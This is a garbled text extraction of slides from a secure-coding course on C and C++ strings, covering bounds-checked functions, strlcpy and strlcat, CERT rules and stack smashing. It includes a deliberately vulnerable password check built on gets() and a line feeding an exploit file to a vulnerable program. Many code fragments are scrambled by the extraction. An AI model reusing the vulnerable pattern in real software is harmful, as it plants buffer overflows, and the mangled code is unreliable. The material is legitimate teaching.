This example can be improved to remove the implementation defined behavior at the cost of some additional complexity: int main(void) { constraint_handler_t t i t h dl t oconstraint t i t = set_constraint_handler_s(ignore_handler_s); get_y_or_n(); } In conformance with ERR00-C. Adopt and implement a consistent and comprehensive error-handling policy, the constraint handler is set in main() for a consistent error handling policy throughout the application. Library functions may wish to avoid setting a specific constraint handler policy because this might conflict with the overall policy enforced by the application. In this case, library functions should assume that calls to bound-checked functions will return and check the return status accordingly.
117
Bounds-checking Interfaces Summary

Implementations include
Non-conforming version available in Microsoft Visual C++ 2005 and 2008. Implemented by the Dinkumware Compleat Library for gcc, EDG, and VC++. VC++ Also appears in the Open Watcom open source cross compiler.

Functions are still capable of overflowing a buffer if the maximum length of the destination buffer is incorrectly specified. The ISO/IEC TR 24731-1 functions are not foolproof Because the C1X Annex K functions can often be used as simple replacements for the original library functions in legacy code, The CERT C S Secure C Coding di S Standard d d rule l STR07-C. STR07 C U Use TR 24731 f for remediation di i of f existing string manipulation code recommends using them for this purpose on implementations that implement the Annex. (Such implementations are expected to define the __STDC_LIB_EXT1__ macro.)
118
59
Callee Allocates, Caller Frees

The second memory management model (callee allocates, caller frees) is implemented by the dynamic allocation functions defined by ISO/IEC TR 24731-2. ISO/IEC TR 24731-2 defines replacements for many of the standard C99 string handling functions that use dynamically allocated memory to ensure that buffer overflow does not occur.
119
Reading from stdin using getline()

#define __STDC_WANT_LIB_EXT2__ 1 #include <stdio.h> #include <stdlib.h> Declares a pointer and t an array. not void get_y_or_n(void) { char *response = NULL; size_t size; printf("Continue? [y] n: "); if ((getline(&response, &size, stdin) < 0) || (size && response[0] == n)) { free(response); f ( ) exit(0); The getline() function } returns a pointer to a free(response); dynamically allocated buffer } and the allocated size. Caller must free() memory
120
60
Dynamic Allocation Functions

Because the use of such functions requires introducing additional calls to free the buffers later, these functions are better suited to new developments than to retrofitting existing code. In general, the functions described in ISO/IEC TR 24731-2 provide greater assurance that buffer overflow problems will not occur, because buffers are always automatically sized to hold the data required. Applications pp that use dynamic y memory y allocation might, g , however, suffer from denial of service attacks where data is presented until memory is exhausted. They are also more prone to dynamic memory management errors, which can also result in vulnerabilities [Seacord 2005].
121
Copying and Concatenating Strings

C99 OpenBSD Bounds-checking Interfaces Dynamic Allocation Functions
122
61
C99
Not all uses of strcpy() are flawed. For example, it is often possible to dynamically allocate the required space:
dest = (char *)malloc(strlen(source) + 1); if (dest) { strcpy(dest, source); } else { /* handle error / */ / ... }
123

124
62
strlcpy() and strlcat()

Copy and concatenate strings in a less error-prone manner.
size_t i t strlcpy(char t l ( h *d *dst, t const char *src, size_t size); size_t strlcat(char *dst, const char *src, size_t size); The strlcpy() function copies the null-terminated string from src to dst (up to size characters). The strlcat() function appends the null-terminated string src to the end of dst (no more than size characters will be in the destination).
125
Size Matters
To help prevent buffer overflows, strlcpy() and strlcat() accept the size of the destination string as an argument argument.
For statically allocated destination buffers, this value is
easily computed at compile time using the sizeof() operator. Dynamic buffer size is not easily computed.
Both functions g guarantee the destination string g is null terminated for all non-zero-length buffers.
126
63
String Truncation
The strlcpy() and strlcat() functions return the total length of the string they tried to create.
For strlcpy() that is simply the length of the source source. For strlcat() it is the length of the destination (before
concatenation) plus the length of the source.
To check for truncation, the programmer must verify that the return value is less than the size argument. If the resulting string is truncated truncated, the programmer
knows the number of bytes needed to store the string may reallocate and recopy
127
strlcpy() and strlcat() Summary

Available for several UNIX variants, including OpenBSD and Solaris, but not GNU/Linux (glibc) The incorrect use of these functions may still result in a buffer overflow if the specified buffer size is longer than the actual buffer length. Truncation errors are also possible if the programmer fails to verify the results of these functions.
128
64

129
Bounds-checking Interfaces
Defines less error-prone versions of C standard functions:
strcpy_s() strcpy s() instead of strcpy() strcat_s() instead of strcat() strncpy_s() instead of strncpy() strncat_s() instead of strncat()
130
65
strcpy_s() Function
Copies characters from a source string to a destination character array up to and including the terminating null character. H th Has the signature i t errno_t strcpy_s( char * restrict s1, rsize_t s1max, const char * restrict s2); Similar S a to st strcpy() cpy() with t extra e taa argument gu e t o of type rsize s e_t t that specifies the maximum length of the destination buffer Only succeeds when the source string can be fully copied to the destination without overflowing the destination buffer
131
Runtime-constraints
Neither s1 nor s2 shall be a null pointer. s1max shall not be > RSIZE_MAX. s1max shall h ll not t equal l zero. s1max shall be > strnlen_s(s2, s1max). Copying shall not take place between objects that overlap. If there is a runtime-constraint violation, , then if s1 is not a null pointer and s1max is greater than zero and not greater than RSIZE_MAX, then strcpy_s() sets s1[0] to the null character.
132
66
strcpy_s() Example
int main(int argc, char* argv[]) { char a[16]; strcpy_s() fails and generates a char b[16]; ti t i t error. runtime constraint char c[24]; strcpy_s(a, strcpy_s(b, strcpy_s(c, strcat_s(c, t t ( } sizeof(a), sizeof(b), sizeof(c), sizeof(c), i f( ) "0123456789abcdef"); "0123456789abcdef"); a); b); b)
133
Open Watcom strcpy_s()

errno_t strcpy_s(char * restrict s1, rsize_t s1max, const char * restrict s2) { errno_t rc = -1; const char *msg; rsize_t s2len = strnlen_s( s2, s1max ); // Verify runtime-constraints if (nullptr_msg( msg, s1 ) && // s1 not NULL nullptr_msg( msg, s2 ) && // s2 not NULL maxsize_msg( msg, s1max ) && // s1max <= RSIZE_MAX zero_msg( msg, s1max ) && // s1max != 0 a_gt_b_msg(msg, s2len, s1max - 1) && // s1max > strnlen_s( s2, s1max ) overlap_msg(msg,s1,s1max,s2,s2len) // s1 s2 no overlap
134
67
Open Watcom strcpy_s() (cont.)

) { while( *s1++ = *s2++); rc = 0; } else { // Runtime-constraints violated, make dest string empty if ((s1 != NULL) && (s1max > 0) && lte_rsizmax(s1max)) { s1[0] = NULLCHAR; } // Now call the handler __rtct_fail( __func__, msg, NULL ); } return( rc ); }
135

C99 OpenBSD C1X Annex K Bounds-checking Interfaces Dynamic Allocation Functions
136
68
Dynamic Allocation Functions

TR 24731-2: Extensions to the C Library - Part II: Dynamic allocation functions The strdup() function is derived from POSIX POSIX.
strdup() returns a pointer to a new string, which is a
duplicate of the argument the returned pointer can be passed to free()
The strndup() function is derived from POSIX.

strndup() t d () is equivalent to strdup() t d () except that
strndup() copies at most n plus one bytes into the newly allocated memory the newly created string is always properly terminated
137
std::basic_string
The basic_string class is less prone to security vulnerabilities than null-terminated byte strings. However some mistakes are still common: However,
using an invalidated or uninitialized iterator passing an out-of-bounds index using an iterator range that really
isnt a range
passing an invalid iterator position using an invalid ordering
138
69
Checked STL Implementation

Most checked standard template library (STL) implementations detect common errors automatically. Use a checked STL implementation (even if only used restrictively). At a minimum, run on a single platform during prerelease testing using your full complement of tests.
139
Beyond basic_string
std::basic_string is implemented in various ways on different platforms and is consequently subject to different types of problems depending on
threading model use of reference counting etc.
Andrei Alexandrescus flex_string is a drop-in replacement for std::basic_string.

Policy-based y design g allows the user to specify p y to a large g degree g how
it's implemented.
Most local character buffers could be more efficiently implemented
with a version of flex_string that uses the small-string optimization.
140
70
String Summary
Buffer overflows occur frequently in C and C++ because these languages
use null-terminated byte strings do not perform implicit bounds bo nds checking provide standard library calls for strings that do not enforce
bounds checking
The basic_string class is less error prone for C++ programs. String functions defined by ISO/IEC Security TR 24731-1 g y system y remediation. are useful for legacy New C language development might consider using dynamic allocation functions, or other managed string libraries.
141
Secure Coding Rules

STR31-C. Guarantee that storage for strings has sufficient space for character data and the null terminator STR32-C. Null-terminate byte strings as required STR33 C Size STR33-C. Si wide id character h t strings ti correctly tl STR34-C. Cast characters to unsigned types before converting to larger integer sizes STR35-C. Do not copy data from an unbounded source to a fixed-length array
142
71
Secure Coding Recommendations

MSC00-C. Compile cleanly at high warning levels STR00-C. Represent characters using an appropriate type STR01-C. Adopt and implement a consistent plan for managing strings STR02-C. Sanitize data passed to complex subsystems STR03-C. Do not inadvertently truncate a null-terminated byte string STR04-C. Use plain char for characters in the basic character set STR07-C. Use TR 24731 for remediation of existing string manipulation code STR08-C. Use managed strings for development of new string manipulation code
143
References
[Buchanan 2008] Erik Buchanan, Ryan Roemer, Hovav Shacham, and Stefan Savage. 2008. When good instructions go bad: generalizing returnoriented programming to RISC. In Proceedings of the 15th ACM conference on Computer and communications security (CCS '08). 08). ACM, New York, NY, USA, 27-38. DOI=10.1145/1455770.1455776 http://doi.acm.org/10.1145/1455770.1455776 [Shacham 2007] Hovav Shacham. The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86). In Proceedings of CCS 2007, ACM Press.
144
72
Questions Q Questions ti about about Strings

g strings
145
73

01 Strings Fdsfds

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

01 Strings Fdsfds

Uploaded by

Copyright:

Available Formats

Secure Coding in C and C++

2011 Carnegie Mellon University

Software vulnerabilities and exploits are caused by weaknesses in

Null-Terminated Byte Strings 1

Null-Terminated Byte Strings 2

to its initial character.

Byte Character Types

Character Type Philosophy

meaning) as opposed to integer data

Consequently, returned by fgetc(), getc(), getchar(), and

Use Plain char for Character Data 1

Use Plain char for Character Data 2

Use Plain char for Character Data 3

search and concatenation.

terminated byte strings

Common String Manipulation Errors

Bounded String Copies

The gets() Function

C++ Unbounded Copy

characters if ios_base::width is set to a value > 0.

<< buf << endl;

Copying and Concatenation

Neither a[] nor b[] is properly terminated.

From ISO/IEC 9899:1999

Write Outside Array Bounds

Improper Data Sanitization

This is an example p of command injection. j

basic_string Element Access

Getting a Null-Terminated Byte String

error. Modifying the returned string can also lead to an error.

Mitigation Strategies Summary

mov $4, %eax mov eax, 4

// ATT&T Notation // Intel Notation

function(4, 2); push 2 push 4 call function (411A29h)

Push 1st arg on stack

Push the return address on stack p to and j jump address

void function(int arg1, int arg2) {

ebp: extended base pointer esp: extended stack pointer

ebp: extended base pointer esp: extended stack pointer

Return to Calling Function

function(4, 2); push 2 push 4 call function (411230h) add esp,8

Restores stack pointer

ebp: extended base pointer esp: extended stack pointer

Sample Program Runs

Run #2 Incorrect Password

Stack Before Call to IsPasswordOK()

Stack During IsPasswordOK() Call

bool IsPasswordOK(void) { char Password[12]; gets(Password); return 0 == strcmp(Password, "goodpass"); }

Stack After IsPasswordOK() Call

Mitigation Strategies Summary

What Is a Buffer Overflow?

Source Memory Destination Memory Copy Operation

Allocated Memory (12 Bytes)

Smashing the Stack

The Buffer Overflow 1

The Buffer Overflow 2

Caller EBP Frame Ptr main (4 bytes) 3456

Mitigation Strategies Summary

Q: What is the difference between code and data? A: Absolutely nothing.

./vulprog < exploit.bin

This exploit is specific to Red Hat Linux 9.0 and GCC.

Mal Arg Decomposed 1

000 010 020 030 040